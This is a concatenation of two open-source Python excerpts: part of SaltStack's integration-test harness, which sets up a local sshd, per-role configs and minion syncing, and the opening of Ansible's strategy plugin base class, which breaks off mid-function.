)
keygen_process_ed25519 = subprocess.Popen(
[
keygen,
"-t",
"ed25519",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ed25519_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_ed25519_err)
)
)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd_config"), "a"
) as ssh_config:
ssh_config.write("AuthorizedKeysFile {0}\n".format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write("HostKey {0}\n".format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write("HostKey {0}\n".format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write("HostKey {0}\n".format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd.pid")
self.sshd_process = subprocess.Popen(
[sshd, "-f", "sshd_config", "-o", "PidFile={0}".format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print(
"sshd had errors on startup: {0}".format(
salt.utils.stringutils.to_str(sshd_err)
)
)
else:
os.environ["SSH_DAEMON_RUNNING"] = "True"
self.prep_syndic()
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "roster"), "a"
) as roster:
roster.write(" user: {0}\n".format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(
" priv: {0}/{1}".format(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
)
sys.stdout.write(" {LIGHT_GREEN}STARTED!\n{ENDC}".format(**self.colors))
@classmethod
def config(cls, role):
"""
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
"""
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
"""
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
"""
if "runtime_client" not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS[
"runtime_client"
] = salt.client.get_local_client(mopts=self.master_opts)
return RUNTIME_VARS.RUNTIME_CONFIGS["runtime_client"]
@classmethod
def transplant_configs(cls, transport="zeromq"):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(
" * Transplanting configuration files to '{0}'".format(
RUNTIME_VARS.TMP_CONF_DIR
)
)
tests_known_hosts_file = os.path.join(
RUNTIME_VARS.TMP_CONF_DIR, "salt_ssh_known_hosts"
)
with salt.utils.files.fopen(tests_known_hosts_file, "w") as known_hosts:
known_hosts.write("")
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "master")
)
master_opts["known_hosts_file"] = tests_known_hosts_file
master_opts["cachedir"] = "cache"
master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
master_opts["pki_dir"] = "pki"
master_opts["syndic_master"] = "localhost"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
master_opts["pytest_stop_sending_events_file"] = pytest_stop_sending_events_file
file_tree = {
"root_dir": os.path.join(FILES, "pillar", "base", "file_tree"),
"follow_dir_links": False,
"keep_newline": True,
}
master_opts["ext_pillar"].append({"file_tree": file_tree})
# Config settings to test `event_return`
if "returner_dirs" not in master_opts:
master_opts["returner_dirs"] = []
master_opts["returner_dirs"].append(
os.path.join(RUNTIME_VARS.FILES, "returners")
)
master_opts["event_return"] = "runtests_noop"
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(
real_prefix, "Scripts", "virtualenv.exe"
)
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "minion")
)
minion_opts["cachedir"] = "cache"
minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
minion_opts["pki_dir"] = "pki"
minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
minion_opts["venv_bin"] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "sub_minion")
)
sub_minion_opts["cachedir"] = "cache"
sub_minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts["root_dir"] = os.path.join(TMP, "rootdir-sub-minion")
sub_minion_opts["pki_dir"] = "pki"
sub_minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
sub_minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
sub_minion_opts["venv_bin"] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "syndic_master")
)
syndic_master_opts["cachedir"] = "cache"
syndic_master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts["root_dir"] = os.path.join(TMP, "rootdir-syndic-master")
syndic_master_opts["pki_dir"] = "pki"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_syndic_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
syndic_master_opts[
"pytest_stop_sending_events_file"
] = pytest_stop_sending_events_file
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = "cache"
syndic_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, "proxy"))
proxy_opts["cachedir"] = "cache"
# proxy_opts['user'] = running_tests_user
proxy_opts["root_dir"] = os.path.join(TMP, "rootdir-proxy")
proxy_opts["pki_dir"] = "pki"
proxy_opts["hosts.file"] = os.path.join(TMP, "rootdir-proxy", "hosts")
proxy_opts["aliases.file"] = os.path.join(TMP, "rootdir-proxy", "aliases")
if transport == "tcp":
master_opts["transport"] = "tcp"
minion_opts["transport"] = "tcp"
sub_minion_opts["transport"] = "tcp"
syndic_master_opts["transport"] = "tcp"
proxy_opts["transport"] = "tcp"
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# Set up config options that require internal data
master_opts["pillar_roots"] = syndic_master_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
minion_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
master_opts["file_roots"] = syndic_master_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
minion_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
master_opts.setdefault("reactor", []).append(
{"salt/minion/*/start": [os.path.join(FILES, "reactor-sync-minion.sls")]}
)
for opts_dict in (master_opts, syndic_master_opts):
if "ext_pillar" not in opts_dict:
opts_dict["ext_pillar"] = []
if salt.utils.platform.is_windows():
opts_dict["ext_pillar"].append(
{"cmd_yaml": "type {0}".format(os.path.join(FILES, "ext.yaml"))}
)
else:
opts_dict["ext_pillar"].append(
{"cmd_yaml": "cat {0}".format(os.path.join(FILES, "ext.yaml"))}
)
# all read, only owner write
autosign_file_permissions = (
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
)
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(INTEGRATION_TEST_DIR, "files", "extension_modules"),
new_extension_modules_path,
)
opts_dict["extension_modules"] = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(
opts_dict["root_dir"], "autosign_file"
)
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, "files", "autosign_file"),
new_autosign_file_path,
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ("hosts", "aliases"):
optname = "{0}.file".format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
sub_minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
proxy_opts["runtests_conn_check_port"] = get_unused_localhost_port()
for conf in (
master_opts,
minion_opts,
sub_minion_opts,
syndic_opts,
syndic_master_opts,
proxy_opts,
):
if "engines" not in conf:
conf["engines"] = []
conf["engines"].append({"salt_runtests": {}})
if "engines_dirs" not in conf:
conf["engines_dirs"] = []
conf["engines_dirs"].insert(0, ENGINES_DIR)
if "log_handlers_dirs" not in conf:
conf["log_handlers_dirs"] = []
conf["log_handlers_dirs"].insert(0, LOG_HANDLERS_DIR)
conf["runtests_log_port"] = SALT_LOG_PORT
conf["runtests_log_level"] = (
os.environ.get("TESTS_MIN_LOG_LEVEL_NAME") or "debug"
)
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry))
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
computed_config = copy.deepcopy(locals()["{0}_opts".format(entry)])
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), "w"
) as fp_:
salt.utils.yaml.safe_dump(
computed_config, fp_, default_flow_style=False
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
sub_minion_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "master"),
)
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_master_computed_config, wfh, default_flow_style=False
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master")
)
minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"),
)
sub_minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion")
)
syndic_master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master")
)
proxy_opts = salt.config.proxy_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "proxy")
)
RUNTIME_VARS.RUNTIME_CONFIGS["master"] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["minion"] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic"] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["sub_minion"] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic_master"] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["proxy"] = freeze(proxy_opts)
verify_env(
[
os.path.join(master_opts["pki_dir"], "minions"),
os.path.join(master_opts["pki_dir"], "minions_pre"),
os.path.join(master_opts["pki_dir"], "minions_rejected"),
os.path.join(master_opts["pki_dir"], "minions_denied"),
os.path.join(master_opts["cachedir"], "jobs"),
os.path.join(master_opts["root_dir"], "cache", "tokens"),
os.path.join(syndic_master_opts["pki_dir"], "minions"),
os.path.join(syndic_master_opts["pki_dir"], "minions_pre"),
os.path.join(syndic_master_opts["pki_dir"], "minions_rejected"),
os.path.join(syndic_master_opts["cachedir"], "jobs"),
os.path.join(syndic_master_opts["root_dir"], "cache", "tokens"),
os.path.join(master_opts["pki_dir"], "accepted"),
os.path.join(master_opts["pki_dir"], "rejected"),
os.path.join(master_opts["pki_dir"], "pending"),
os.path.join(syndic_master_opts["pki_dir"], "accepted"),
os.path.join(syndic_master_opts["pki_dir"], "rejected"),
os.path.join(syndic_master_opts["pki_dir"], "pending"),
os.path.join(minion_opts["pki_dir"], "accepted"),
os.path.join(minion_opts["pki_dir"], "rejected"),
os.path.join(minion_opts["pki_dir"], "pending"),
os.path.join(sub_minion_opts["pki_dir"], "accepted"),
os.path.join(sub_minion_opts["pki_dir"], "rejected"),
os.path.join(sub_minion_opts["pki_dir"], "pending"),
os.path.dirname(master_opts["log_file"]),
minion_opts["extension_modules"],
sub_minion_opts["extension_modules"],
sub_minion_opts["pki_dir"],
master_opts["sock_dir"],
syndic_master_opts["sock_dir"],
sub_minion_opts["sock_dir"],
minion_opts["sock_dir"],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts["root_dir"],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""
Kill the minion and master processes
"""
try:
if hasattr(self.sub_minion_process, "terminate"):
self.sub_minion_process.terminate()
else:
log.error("self.sub_minion_process can't be terminate.")
except AttributeError:
pass
try:
if hasattr(self.minion_process, "terminate"):
self.minion_process.terminate()
else:
log.error("self.minion_process can't be terminate.")
except AttributeError:
pass
if hasattr(self, "proxy_process"):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, "terminate"):
self.master_process.terminate()
else:
log.error("self.master_process can't be terminate.")
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
"""
Subclass this method for additional minion setups.
"""
def setup_minions(self):
"""
Minions setup routines
"""
def post_setup_minions(self):
"""
Subclass this method to execute code after the minions have been setup
"""
def _enter_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ["PATH"] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, "sshd_process"):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ["PATH"] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
"""
Clean out the tmp files
"""
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (
TMP,
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception: # pylint: disable=broad-except
log.exception("Failed to remove directory: %s", dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
" * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}".format(
"{0}".format(expire - now).rsplit(".", 1)[0],
", ".join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
"\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information "
"back\n".format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(list(targets), "saltutil.running", tgt_type="list")
return [k for (k, v) in six.iteritems(running) if v and v[0]["jid"] == jid]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
" {LIGHT_BLUE}*{ENDC} Syncing minion's {1} "
"(saltutil.sync_{1})".format(
", ".join(targets), modules_kind, **self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets),
"saltutil.sync_{0}".format(modules_kind),
tgt_type="list",
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info["jid"], timeout) is False:
print(
" {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. "
"Tests requiring these {0} WILL fail".format(
modules_kind, **self.colors
)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info["jid"], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output["ret"]:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output["ret"], six.string_types):
# An errors has occurred
print(
" {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: "
"{1}".format(
name, output["ret"], modules_kind, **self.colors
)
)
return False
print(
" {LIGHT_GREEN}*{ENDC} Synced {0} {2}: "
"{1}".format(
name, ", ".join(output["ret"]), modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
" {LIGHT_RED}*{ENDC} {0} already synced??? "
"{1}".format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionStates")
self.sync_minion_modules_("states", targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionModules")
self.sync_minion_modules_("modules", targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionGrains")
self.sync_minion_modules_("grains", targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
"""
Ensure all minions and masters (including sub-masters) are connected.
"""
while True:
try:
ret = self.client.run_job("*", "test.ping")
except salt.exceptions.SaltClientError:
ret = None
if ret and "minions" not in ret:
continue
if ret and sorted(ret["minions"]) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
|
__init__.py
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import threading
import time
from collections import deque
from multiprocessing import Lock
from jinja2.exceptions import UndefinedError
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError, AnsibleUndefinedVariable
from ansible.executor import action_write_locks
from ansible.executor.process.worker import WorkerProcess
from ansible.executor.task_result import TaskResult
from ansible.inventory.host import Host
from ansible.module_utils.six.moves import queue as Queue
from ansible.module_utils.six import iteritems, string_types
from ansible.module_utils._text import to_text
from ansible.playbook.helpers import load_list_of_blocks
from ansible.playbook.included_file import IncludedFile
from ansible.playbook.task_include import TaskInclude
from ansible.playbook.role_include import IncludeRole
from ansible.plugins.loader import action_loader, connection_loader, filter_loader, lookup_loader, module_loader, test_loader
from ansible.template import Templar
from ansible.utils.vars import combine_vars
from ansible.vars.manager import strip_internal_keys
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['StrategyBase']
class StrategySentinel:
pass
# TODO: this should probably be in the plugins/__init__.py, with
# a smarter mechanism to set all of the attributes based on
# the loaders created there
class SharedPluginLoaderObj:
'''
A simple object to make pass the various plugin loaders to
the forked processes over the queue easier
'''
def __init__(self):
self.action_loader = action_loader
self.connection_loader = connection_loader
self.filter_loader = filter_loader
self.test_loader = test_loader
self.lookup_loader = lookup_loader
self.module_loader = module_loader
_sentinel = StrategySentinel()
def results_thread_main(strategy):
while True:
try:
result = strategy._final_q.get()
if isinstance(result, StrategySentinel):
break
else:
strategy._results_lock.acquire()
strategy._results.append(result)
strategy._results_lock.release()
except (IOError, EOFError):
break
except Queue.Empty:
pass
class StrategyBase:
'''
This is the base class for strategy plugins, which contains some common
code useful to all strategies like running handlers, cleanup actions, etc.
'''
def __init__(self, tqm):
self._tqm = tqm
self._inventory = tqm.get_inventory()
self._workers = tqm.get_workers()
self._notified_handlers = tqm._notified_handlers
self._listening_handlers = tqm._listening_handlers
self._variable_manager = tqm.get_variable_manager()
self._loader = tqm.get_loader()
self._final_q = tqm._final_q
self._step = getattr(tqm._options, 'step', False)
self._diff = getattr(tqm._options, 'diff', False)
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# internal counters
self._pending_results = 0
self._cur_worker = 0
# this dictionary is used to keep track of hosts that have
# outstanding tasks still in queue
self._blocked_hosts = dict()
self._results = deque()
self._results_lock = threading.Condition(threading.Lock())
# create the result processing thread for reading results in the background
self._results_thread = threading.Thread(target=results_thread_main, args=(self,))
self._results_thread.daemon = True
self._results_thread.start()
def cleanup(self):
self._final_q.put(_sentinel)
self._results_thread.join()
def run(self, iterator, play_context, result=0):
# execute one more pass through the iterator without peeking, to
# make sure that all of the hosts are advanced to their final task.
# This should be safe, as everything should be ITERATING_COMPLETE by
# this point, though the strategy may not advance the hosts itself.
[iterator.get_next_task_for_host(host) for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
# save the failed/unreachable hosts, as the run_handlers()
# method will clear that information during its execution
failed_hosts = iterator.get_failed_hosts()
unreachable_hosts = self._tqm._unreachable_hosts.keys()
display.debug("running handlers")
handler_result = self.run_handlers(iterator, play_context)
if isinstance(handler_result, bool) and not handler_result:
result |= self._tqm.RUN_ERROR
elif not handler_result:
result |= handler_result
# now update with the hosts (if any) that failed or were
# unreachable during the handler execution phase
failed_hosts = set(failed_hosts).union(iterator.get_failed_hosts())
unreachable_hosts = set(unreachable_hosts).union(self._tqm._unreachable_hosts.keys())
# return the appropriate code, depending on the status hosts after the run
if not isinstance(result, bool) and result != self._tqm.RUN_OK:
return result
elif len(unreachable_hosts) > 0:
return self._tqm.RUN_UNREACHABLE_HOSTS
elif len(failed_hosts) > 0:
return self._tqm.RUN_FAILED_HOSTS
else:
return self._tqm.RUN_OK
def get_hosts_remaining(self, play):
return [host for host in self._inventory.get_hosts(play.hosts)
if host.name not in self._tqm._failed_hosts and host.name not in self._tqm._unreachable_hosts]
def get_failed_hosts(self, play):
return [host for host in self._inventory.get_hosts(play.hosts) if host.name in self._tqm._failed_hosts]
def add_tqm_variables(self, vars, play):
'''
Base class method to add extra variables/information to the list of task
vars sent through the executor engine regarding the task queue manager state.
'''
vars['ansible_current_hosts'] = [h.name for h in self.get_hosts_remaining(play)]
vars['ansible_failed_hosts'] = [h.name for h in self.get_failed_hosts(play)]
def _queue_task(self, host, task, task_vars, play_context):
''' handles queueing the task up to be sent to a worker '''
display.debug("entering _queue_task() for %s/%s" % (host.name, task.action))
# Add a write lock for tasks.
# Maybe this should be added somewhere further up the call stack but
# this is the earliest in the code where we have task (1) extracted
# into its own variable and (2) there's only a single code path
# leading to the module being run. This is called by three
# functions: __init__.py::_do_handler_run(), linear.py::run(), and
# free.py::run() so we'd have to add to all three to do it there.
# The next common higher level is __init__.py::run() and that has
# tasks inside of play_iterator so we'd have to extract them to do it
# there.
if task.action not in action_write_locks.action_write_locks:
display.debug('Creating lock for %s' % task.action)
action_write_locks.action_write_locks[task.action] = Lock()
# and then queue the new task
try:
